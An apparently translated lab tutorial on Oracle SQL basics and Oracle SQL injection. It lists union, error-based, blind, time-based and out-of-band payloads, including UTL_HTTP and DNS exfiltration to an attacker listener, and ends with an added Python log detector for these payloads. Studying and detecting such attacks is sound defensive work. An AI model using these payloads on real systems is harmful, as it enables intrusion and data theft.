0x00 Oracle Basics

Basic use of Oracle

What is the Oracle database?

  • Oracle Corporation is currently one of the largest software vendors in the world, alongside Microsoft and Adobe. As Oracle has developed, it has become one of the largest providers of enterprise office platforms.

  • The Oracle database is the core product of Oracle Corporation. It is a database management system suited to large and medium-sized enterprises. Among all database management systems (such as Microsoft SQL Server, IBM's DB2, etc.), Oracle's users cover the widest range of sectors, including banking, telecom, mobile communications, aviation, insurance, finance, e-commerce and multinational corporations. The Oracle product itself is free and the installation package can be downloaded from the official website; Oracle's services, on the other hand, are charged.

  • Website: https://www.oracle.com/cn/index.html

Characteristics of the Oracle database

  • Complete data management functions

  • Large data volumes

  • Preservation and persistence of data

  • Data sharing

  • A complete relational product

  • Information rule --- in a relational DBMS all information is represented logically in one way, namely as explicit values in tables

  • Guaranteed access rule

  • View update rule --- whenever the data in the tables that form a view changes, the data in the corresponding view changes at the same time

  • Complete data management functions

  • Distributed processing

  • An Oracle distributed database consists of Oracle RDBMS, SQL*Net, SQL*Connect and other non-Oracle relational products

Advantages and disadvantages of Oracle compared with other databases

  • Advantages

  • Openness: Oracle runs on all mainstream platforms (including Windows), fully supports all industry standards, follows a fully open strategy so that customers can choose the solution that suits them, and fully supports developers

  • Parallelism: Oracle Parallel Server extends the capabilities of Windows NT by letting a group of nodes share the work of the same cluster, providing cluster solutions with high availability and high scalability

  • Security: has obtained the highest level of ISO standard security certification.

  • Performance: Oracle offers high performance and holds the TPC-D and TPC-C world records on open platforms

  • Usage risk: Oracle has long development experience, is fully compatible, is widely used and carries low risk

  • Disadvantages

  • High hardware requirements

  • Expensive

  • Management and maintenance are cumbersome

  • Operation is complex and requires a high level of skill

Common Oracle data types

Logging in to the Oracle database

Basic table management statements in Oracle

Create a table
create table table_name ( column_name type constraint )
create table ichunqiu(name char(10) primary key,age int)
Add a column
alter table table_name add( column_name data_type )
alter table ichunqiu add(class_name varchar2(200))
Drop a column from the table (mark it unused)
alter table table_name set unused column column_name
alter table ichunqiu set unused column name
Modify a table column
alter table table_name modify( column_name new_type )
alter table ichunqiu modify(name varchar(200))

**Basic data manipulation statements in Oracle**

**Query**
select *| column_name | expression from table_name where condition order by column_name
select * from ichunqiu order by age desc ( descending )
select * from ichunqiu order by age asc ( ascending )
select * from ichunqiu order by age ( ascending by default )
**Insert**
insert into table_name values( values of all columns, in order )
insert into table_name ( column1, column2, column3,...) values( corresponding values )
insert into ichunqiu(name,age) values('icq',18)
insert into ichunqiu values('icq',18,'web')
**Update**
update table_name set column_name = value where update_condition
update ichunqiu set age=25 where name='icq'
**Delete**
delete table_name where condition
delete ichunqiu where name='ii'
  • Truncate

  • Syntax: truncate table table_name

  • Explanation: deletes all the data in the table at once

  • Difference between truncate and delete

  1. truncate is a DDL command and the deleted data cannot be recovered; delete is a DML command and the deleted data can be recovered from the database's log files

  2. If a table has many records, truncate is faster than delete

Oracle access control

Overview of Oracle privileges

  • Privileges allow a user to access objects belonging to other users or to execute programs. Oracle provides three kinds of privileges: object level, system level and role level. These privileges can be granted to users, to the special user PUBLIC, or to roles. Granting a privilege to the special user PUBLIC (PUBLIC is predefined in Oracle, and every user has whatever rights this user has) effectively grants it to every user of the database.

  • A role is a tool for administering privileges. A privilege can be granted to a role, and a role can be granted to another role or to a user. Users inherit privileges through roles; roles serve no purpose other than administering privileges. A privilege that has been granted can be revoked in the same way.

Privilege classification

  • There are two types of privileges in the Oracle database
  1. System privileges: the rights the system gives a user to use the database (system privileges apply to users)

  2. Entity (object) privileges: a user's access rights to another user's tables or views (they apply to a table or view)

System privileges (user privilege management)

  • Classification of system privileges

  • DBA: has all privileges. It is the highest authority in the system, and only a DBA can create a database structure

  • RESOURCE: a user with the Resource privilege can only create entities and cannot create a database structure

  • CONNECT: a user with the Connect privilege can only log in to Oracle; it can create neither entities nor a database structure

  • For ordinary users: grant the connect, resource privileges

  • For DBA administration users: grant the connect, resource, dba privileges

System privilege grant command

  • System privileges can only be granted by DBA users: sys, system (initially only these two users exist)
SQL> grant connect,resource,dba to username1[, username2]...;

SQL> create user user50 identified by user50;
SQL> grant connect,resource to user50;

Note: an ordinary user can be granted the same privileges as the system user, but not the same privileges as the sys user; the privileges of the system user can also be revoked.

Entity privileges (table privilege management)

  • Classification of entity privileges

  • select, update, insert, alter, index, delete, all // all includes all privileges

  • execute // privilege to execute a stored procedure

  • Examples:

grant select, insert, update on tablename to userA;            -- grant privileges to the user userA
grant select, insert, update on tablename to public;           -- grant privileges to all users
grant select, update on product to userA with grant option;    -- userA receives the privileges and can pass them on
revoke select, insert, update on tablename from userA;         -- revoke the granted privileges from the user userA
revoke select, insert, update on tablename from public;        -- revoke the granted privileges from all users

Note: if you revoke an object privilege from a user, the same privilege is also removed from every user to whom that user granted it using WITH GRANT OPTION; that is, revoking object privileges cascades.

0x01 Common injection types

Background knowledge

  • The dual table in Oracle

  • This table is a built-in table of the Oracle database; it exists to satisfy the query syntax and produce a result

  • Features of the dual table

  1. dual is a pseudo-table in Oracle (it has only one row and one column)

  2. Every user can use it

  3. If the dual table is deleted, sys can restore it

  • In Oracle, a query statement must be followed by a table name, for example:

  • MySQL: union select 1, 2, 3

  • Oracle: union select 1, 2, 3 from dual

  • Comments in Oracle

  • The single-line comment symbol is --

  • The multi-line comment symbols are /* */

  • Strong typing in Oracle

  • When performing a UNION query in Oracle, the data type at each position must match the data type of the corresponding column in the table; null can be used at positions whose data type cannot be guessed quickly

  • Example:

  • mysql: union select 1, 2, 3

  • oracle: union select null, null, null from dual

union query injection

Basic process of Oracle union query injection

**1. Determine whether injection exists**
http://172.16.12.2:81/orcl.php?id=1' " and 1=1 and '1'='1' or '1'='1'
**2. Determine the number of columns**
The current table has 4 columns
id=1 order by 4--
**3. Union query to find the displayed positions**
An Oracle query needs from dual (a virtual / pseudo table), a table provided specifically for query statements
union select * from dual--
id=1 union select 1,2,3,4 from dual--
null can stand in for any type
id=1 union select null,null,null,null from dual--
id=1 union select 1,'admin',3,4 from dual--
**4. Query the database version, the connected database user and the current instance name**
id=1 union select 1,(select banner from sys.v_$version where rownum=1),3,4 from dual--
id=1 union select 1,(select SYS_CONTEXT('USERENV','CURRENT_USER') from dual),3,4 from dual-- #test
id=-1 union select 1,(select instance_name from v$instance),3,4 from dual--
**5. Enumerate database names (schema owners)**
id=-1 union select 1,(select owner from all_tables where rownum=1),3,4 from DUAL--
id=-1 union select 1,(select owner from all_tables where rownum=1 and owner not in ('SYS')),3,4 from DUAL--
id=-1 union select 1,(select owner from all_tables where rownum=1 and owner not in('SYS','OUTLN','SYSTEM')),3,4 from DUAL--
**6. Enumerate table names**
id=-1 union select 1,(select table_name from user_tables where rownum=1 and table_name not in ('ADMIN1','DEMO','FLAG','ICHUNQIU','STU')),3,4 from DUAL--
**7. Enumerate the column names of the flag table**
id=-1 union select 1,(select column_name from user_tab_columns where rownum=1 and table_name='FLAG' AND column_name not in ('id','name','pwd','flag')),3,4 from DUAL--
**8. Query column data**
id=-1 union select 1,(select NAME||AGE FROM DEMO where rownum=1),3,4 from dual--
id=-1 union select 1,(select "name"||"age" FROM DEMO where rownum=1),3,4 from dual--
id=-1 union select 1,(select 'username:'||NAME||'age:'||AGE FROM DEMO where rownum=1),3,4 from dual--

Error-based injection

Common error-reporting functions

  1. dbms_xdb_version.checkin() function
  • The checkin function of the dbms_xdb_version package. It checks in a checked-out version-controlled resource (VCR) and returns the resource ID of the newly created version.

  • payload:

and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null--
  2. dbms_xdb_version.uncheckout() function
  • Usage is the same as checkin

  • payload:

and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null--
  3. **utl_inaddr.get_host_name()** function
  • Explanation: in Oracle 8g, 9g and 10g this method requires no privileges, but in **Oracle 11g and later** access control was strengthened, so from 11g on the current database user must have network access privileges for this method to be usable in error-based injection

  • Error-reporting mechanism: it resolves a host name to an IP address; if its argument cannot be resolved, an error is raised that echoes the argument passed in. If the argument is a SQL subquery, the error message therefore shows the query result.

  • payload:

and utl_inaddr.get_host_name((select user from dual))=1--

Other commonly used error-reporting functions

| Function name | payload |
|---|---|
| dbms_xdb_version.makeversioned() | and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null-- |
| dbms_utility.sqlid_to_sqlhash() | and (select dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null-- |
| ordsys.ord_dicom.getmappingxpath() | and (select ordsys.ord_dicom.getmappingxpath((select user from dual),user,user) from dual)=1-- |
| ctxsys.drithsx.sn() | and (select ctxsys.drithsx.sn((select user from dual)) from dual)=1-- |

Basic process of Oracle error-based injection

**1. Determine whether injection exists**
http://172.16.12.2:81/orcl.php?id=1' " and 1=1 and '1'='1' or '1'='1'
**2. Query the database version, the connected database user and the current instance name**
id=1 and dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select SYS_CONTEXT('USERENV','CURRENT_USER') from dual)) is not null--
id=1 and dbms_xdb_version.checkin((select instance_name from v$instance)) is not null--
**3. Enumerate database names (schema owners)**
id=1 and dbms_xdb_version.checkin((select owner from all_tables where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select owner from all_tables where rownum=1 and owner not in ('SYS'))) is not null--
**4. Enumerate table names**
id=1 and dbms_xdb_version.checkin((select table_name from user_tables where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select table_name from user_tables where rownum=1 and table_name not in ('ADMIN1','DEMO'))) is not null--
**5. Enumerate column names**
id=1 and dbms_xdb_version.checkin((select column_name from user_tab_columns where rownum=1 and table_name='FLAG' AND column_name not in ('id','name','pwd','flag'))) is not null--
**6. Query column data**
id=1 and dbms_xdb_version.checkin((select NAME||AGE FROM DEMO where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select "name"||"age" FROM DEMO where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select 'username:'||NAME||'age:'||AGE FROM DEMO where rownum=1)) is not null--

Boolean blind injection

Functions used in boolean blind injection

  1. decode() **function**
  • Usage: decode( condition, value1, translation1, value2, translation2, ... valueN, translationN, default )

  • Meaning: if (condition == value1) return translation1, and so on; otherwise return the default value

  • Example: query the Oracle version and judge whether the first character of the version string is O

  • Payload:

and 1=(select decode(substr((select banner from sys.v_$version where rownum=1),1,1),'O',1,0) from dual)--
  • Note: the inner select statement can be replaced, for example by:

  • Get the current user: select user from dual;

  • Get the length of a string: select length(user) from dual;

  2. instr() **function**
  • Usage: instr( string1, string2 ) / instr( source string, target string )

  • Meaning: searches for the specified string and returns the position where it is found; string1 is the string being searched, string2 is the string to search for

  • Injection idea: instr returns the position of the target string within the query result, and 0 if it is not found; by iterating over positions the data can be recovered character by character

  • Example: query the current user and judge whether the first character of the user name is T

  • Payload:

and 1=(instr((select user from dual),'T'))--

Basic process of Oracle boolean blind injection

**1. Determine whether injection exists**
http://172.16.12.2:81/orcl.php?id=1' " and 1=1 and '1'='1' or '1'='1'
**2. Query the database version / user**
decode: decode(substr(('abc'),1,1),'a',1,0)
length: returns the length of a string
ascii: returns the ASCII code of a character
instr: whether the query result contains the keyword; returns 1 if it is found (at the first position), otherwise 0
id=1 and 1=(select decode(substr((select banner from sys.v_$version where rownum=1),1,1),'O',1,0) from dual)--
id=1 and (select length(user) from dual)=4--
id=1 and (select ascii('a') from dual)=97--
id=1 and (select ascii(substr((select user from dual),1,1)) from dual)=84-- # ASCII code 84 is the character T
id=1 and (select ascii(substr((select user from dual),2,1)) from dual)=69-- # ASCII code 69 is the character E
id=1 and 1=(instr((select user from dual),'T'))--
id=1 and 1=(instr((select user from dual),'TE'))--
id=1 and 1=(instr((select user from dual),'TES'))--
id=1 and 1=(instr((select user from dual),'TEST'))--
**3. Get the database name (schema owner)**
id=1 and (select length(owner) from all_tables where rownum=1)=3-- # the first owner name has length 3
id=1 and (select ascii(substr((select owner from all_tables where rownum=1),1,1)) from dual)=83-- # ASCII 83 is S
id=1 and (select ascii(substr((select owner from all_tables where rownum=1),2,1)) from dual)=89-- # ASCII 89 is Y
id=1 and (select ascii(substr((select owner from all_tables where rownum=1),3,1)) from dual)=83-- # ASCII 83 is S
**4. Get the table name**
id=1 and (select ascii(substr((select table_name from user_tables where rownum=1),1,1)) from dual)=105-- # the first character of the first table name is i
id=1 and (select ascii(substr((select table_name from user_tables where rownum=1),2,1)) from dual)=99-- # the second character of the first table name is c
**5. Get the column name**
id=1 and (select ascii(substr((select column_name from user_tab_columns where rownum=1 and table_name='icq'),1,1)) from dual)=117-- # the first character of the first column of the icq table is u
id=1 and (select ascii(substr((select column_name from user_tab_columns where rownum=1 and table_name='icq'),2,1)) from dual)=115-- # the second character of the first column of the icq table is s

Time-based blind injection

Functions used in time-based blind injection

  • DBMS_PIPE.RECEIVE_MESSAGE() **function**

  • Usage: DBMS_PIPE.RECEIVE_MESSAGE(' any value ', delay in seconds )

  • Example: DBMS_PIPE.RECEIVE_MESSAGE('ICQ',5) waits 5 seconds for data to be returned from the ICQ pipe

  • payload

and DBMS_PIPE.RECEIVE_MESSAGE('ICQ',5)=1

Commonly used payloads

id=1 and dbms_pipe.receive_message(('ICQ'), 5)=1
id=1 and (select decode(substr((select banner from sys.v_$version where rownum=1),1,1),'O', dbms_pipe.receive_message('ICQ', 5),0) from dual)=1--
If the first character of the database version is O, the response is delayed by 5s
id=1 and (select decode(length(user),4,dbms_pipe.receive_message('ICQ', 5),0) from dual)=1--
If the length of the user name is 4, the response is delayed by 5s

Out-of-band injection

Oracle out-of-band injection

  • Oracle out-of-band injection is very similar to DNSLOG: it relies on functions that make network requests for injection and exploitation. The functions that can make network requests are as follows

Functions used in out-of-band injection

  • utl_http.request() **function**

  • Function description: Oracle provides the utl_http.request function to fetch information from a web server, so an attacker can listen on a port and have this function send the required data out in a request

  • The UTL_HTTP package: provides operations on HTTP.

  • Example: executing this SQL statement returns the HTML source of baidu.com

select UTL_HTTP.REQUEST('http://www.baidu.com') from dual
  • utl_inaddr.get_host_address() function

  • Commonly used payload (aaa.com stands for a dnslog domain you set up yourself)

and (select utl_inaddr.get_host_address((select user from dual)||'.aaa.com') from dual) is not null --
  • SYS.DBMS_LDAP.INIT() function

  • Commonly used payload (aaaa.com stands for a dnslog domain you set up yourself)

and (select SYS.DBMS_LDAP.INIT((select user from dual)||'.aaaa.com') from dual) is not null --

Out-of-band injection process

  1. Check whether the UTL_HTTP stored procedure is available
  • Submit the following query at the injection point:
select count(*) from all_objects where object_name='UTL_HTTP'
  • Judge from the page response whether UTL_HTTP is available: if the page returns normally, the UTL_HTTP stored procedure is available
  2. Use nc to listen for data
  • Use nc locally to listen on a port; the local host needs a public IP address

  • nc -lvvp listening_port

  3. Send the data out
  • Submit at the injection point:
and UTL_HTTP.request('http://ip:listening_port/'||( query statement ))=1--

The injection attack can then be carried out

Note: every time a request is submitted at the injection point, nc disconnects after receiving it, so nc has to be restarted to listen again

Commonly used payloads

# Check whether utl_http is available
id=1 and exists (select count(*) from all_objects where object_name='UTL_HTTP')--
id=1 and (select count(*) from all_objects where object_name='UTL_HTTP')>1--
id=1 union select 1,null,3,(select count(*) from all_objects where object_name='UTL_HTTP') from dual--
# Send a request carrying the current user name
id=1 and UTL_HTTP.request('http://ip:listening_port/'||(select user from dual))=1--
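The five injection families above (union ... from dual, the error-reporting packages, decode/instr/ascii boolean tests, dbms_pipe delays, and the UTL_HTTP / UTL_INADDR / DBMS_LDAP out-of-band calls) leave characteristic fingerprints in web-server logs. The following detector is an added example, not code from the original post: it decodes each request's query string (including double URL-encoding and /* */ comment padding) and reports which family it matches. The access-log lines, client IPs and the host name oob-listener.example are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache "combined" style). They are not
# real traffic; they only reproduce the request shapes discussed on this page.
SAMPLE_LOG = r"""
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /orcl.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /orcl.php?id=-1%20union%20select%201,(select%20banner%20from%20sys.v_$version%20where%20rownum=1),3,4%20from%20dual-- HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /orcl.php?id=1%20and%20dbms_xdb_version.checkin((select%20user%20from%20dual))%20is%20not%20null-- HTTP/1.1" 500 312
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /orcl.php?id=1%20and%20(select%20decode(length(user),4,dbms_pipe.receive_message('ICQ',5),0)%20from%20dual)=1-- HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:10 +0000] "GET /orcl.php?id=1%2520and%2520UTL_HTTP.request('http://oob-listener.example/'||(select%2520user%2520from%2520dual))=1-- HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /search.php?q=dual+sim+phone HTTP/1.1" 200 2048
"""

# Fingerprints of the injection families described on this page, matched
# against the decoded, lower-cased, whitespace-normalised query string.
RULES = [
    ("union_query", re.compile(r"\bunion\s+(?:all\s+)?select\b.*\bfrom\s+dual\b")),
    ("error_based", re.compile(
        r"\b(?:dbms_xdb_version\.(?:checkin|uncheckout|makeversioned)"
        r"|utl_inaddr\.get_host_name|dbms_utility\.sqlid_to_sqlhash"
        r"|ctxsys\.drithsx\.sn|ordsys\.ord_dicom\.getmappingxpath)\s*\(")),
    ("boolean_blind", re.compile(
        r"\bselect\b.*\b(?:decode|instr|ascii|substr)\s*\("
        r"|\b(?:decode|instr|ascii|substr)\s*\(.*\bselect\b")),
    ("time_based", re.compile(r"\bdbms_pipe\.receive_message\s*\(")),
    ("out_of_band", re.compile(
        r"\b(?:utl_http\.request|utl_inaddr\.get_host_address|dbms_ldap\.init)\s*\(")),
    ("catalog_enum", re.compile(
        r"\b(?:all_tables|user_tables|user_tab_columns|all_objects"
        r"|v\$instance|sys\.v_\$version)\b")),
]

# client ip, then the request path out of the quoted request line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) HTTP/')


def normalise(query: str) -> str:
    """Undo up to three layers of URL encoding, drop /* */ comments and fold
    case and whitespace, so simple encoding tricks do not hide the keywords."""
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    query = re.sub(r"/\*.*?\*/", " ", query)
    return re.sub(r"\s+", " ", query).lower()


def classify(query: str) -> list[str]:
    """Return the names of every rule that fires on one raw query string."""
    text = normalise(query)
    return [name for name, rx in RULES if rx.search(text)]


def scan_log(log_text: str) -> list[dict]:
    """Parse each access-log line and report the requests that hit a rule."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, path = m.groups()
        query = path.partition("?")[2]
        cats = classify(query)
        if cats:
            hits.append({"client": client, "path": path, "categories": cats})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["client"], hit["categories"], hit["path"][:70])
```

Only the four injected requests are reported; the plain `id=1` request and the search for "dual sim phone" do not match, because the union rule requires the whole `union select ... from dual` shape rather than the word `dual` alone.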
